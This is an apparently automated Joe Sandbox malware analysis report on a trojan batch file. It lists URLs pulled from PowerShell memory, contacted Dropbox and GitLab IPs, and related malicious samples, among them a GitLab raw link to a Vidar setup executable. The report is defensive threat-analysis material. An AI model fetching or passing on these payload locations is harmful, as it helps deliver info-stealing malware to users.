                                                                    		high
                                                                    https://instructorledlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.dropbox.com/page_success/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://gitlab.compowershell.exe, 0000000E.00000002.2354438721.0000028FBE712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF0FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.dropbox.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.dropbox.com/pithos/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://sales.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com/cd/0/get/CghiprcqMx-t_0kStAteoG_83aAwpowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://photos.dropbox.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://a.sprig.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.docsend.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.dropbox.com/encrypted_folder_download/service_worker.jspowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://gitlab.com/assets/powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_envpowershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://navi.dropbox.jp/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://contoso.com/powershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.2301223891.000001FE90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2301223891.000001FE901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2412081496.0000028FCDC92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF4BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2412081496.0000028FCDB50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2524456797.000002951006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2524456797.00000295101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.dropbox.com/static/api/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://edge-block-www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2287555017.000001FE81668000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://apis.google.compowershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://officeapps-df.live.compowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://api.login.yahoo.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000C.00000002.2287555017.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBDAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.0000029500001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://sentry.gitlab.netpowershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://login.yahoo.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.2287555017.000001FE81668000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://docsend.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://www.dropbox.com/playlist/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://www.recaptcha.net/powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://onedrive.live.com/pickerpowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://gitlab.com(powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://nuget.org/NuGet.exepowershell.exe, 0000000C.00000002.2301223891.000001FE90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2301223891.000001FE901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2412081496.0000028FCDC92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF4BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2412081496.0000028FCDB50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2524456797.000002951006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2524456797.00000295101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://showcase.dropbox.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://www.dropbox.com/static/serviceworker/powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.dropbox.compowershell.exe, 0000000C.00000002.2287555017.000001FE80C32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000010.00000002.2439845650.0000029500231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000010.00000002.2439845650.0000029500231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://go.micropowershell.exe, 0000000C.00000002.2287555017.000001FE80C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBE712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.0000029500C31000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://new-sentry.gitlab.netpowershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://contoso.com/Iconpowershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://gitlab.com/powershell.exe, 0000000E.00000002.2422979302.0000028FD5E90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.dropbox.com/v/s/playlist/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www-env.dropbox-dns.compowershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000010.00000002.2439845650.0000029500231000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://docs.sandbox.google.com/document/fsip/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://docs.sandbox.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://docs.google.com/document/fsip/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://help.dropbox.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://docs.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://canny.io/sdk.jspowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.dropbox.com/scl/fi/q2jv8nnxln07zxpowershell.exe, 0000000C.00000002.2307737559.000001FEF8A00000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://gitlab.com/-/sandbox/powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://gitlab.com/admin/powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://customers.gitlab.compowershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://gitlab.com/-/speedscope/index.htmlpowershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://selfguidedlearning.dropboxbusiness.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://www.google.com/recaptcha/powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.compowershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://sourcegraph.compowershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://aka.ms/pscore68powershell.exe, 0000000C.00000002.2287555017.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBDAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.0000029500001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://docs.sandbox.google.com/presentation/fsip/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          http://www.apache.opowershell.exe, 0000000E.00000002.2422979302.0000028FD5E90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://dl-web.dropbox.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://app.hellofax.com/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://cfl.dropboxstatic.com/static/powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.paypal.com/sdk/jspowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://docs.google.com/spreadsheets/fsip/powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://www.dropbox.com/csp_log?policy_name=metaserver-whitelistpowershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high

                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                      172.65.251.78
                                                                                                                                                                                                      		gitlab.comUnited States
                                                                                                                                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                      162.125.69.18
                                                                                                                                                                                                      		www-env.dropbox-dns.comUnited States
                                                                                                                                                                                                      		19679DROPBOXUSfalse

                                                                                                                                                                                                      General Information

                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                      Analysis ID:1578271
                                                                                                                                                                                                      Start date and time:2024-12-19 14:12:14 +01:00
                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 6m 7s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                      Number of analysed new started processes analysed:19
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                      Sample name:hngadsfkgj17.bat
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal88.troj.evad.winBAT@30/16@3/2
                                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                      • Number of executed functions: 14
                                                                                                                                                                                                      • Number of non-executed functions: 1
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .bat

                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 2012 because it is empty
                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 5260 because it is empty
                                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 5272 because it is empty
                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                      • VT rate limit hit for: hngadsfkgj17.bat

                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                      08:13:22API Interceptor66x Sleep call for process: powershell.exe modified

                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                      IPs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                      • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
                                                                                                                                                                                                      162.125.69.18QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                        CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                          xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                            RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                  jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                    Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                      https://t.ly/2PGC5Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse

                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          gitlab.comhnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          Garsdgwqa13de.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          hngarm13de02.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          3_Garmin_Campaign Information for Partners(12-11).docx.lnk.download.lnkGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
                                                                                                                                                                                                                          garsukhjdf11.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                          • 172.65.251.78
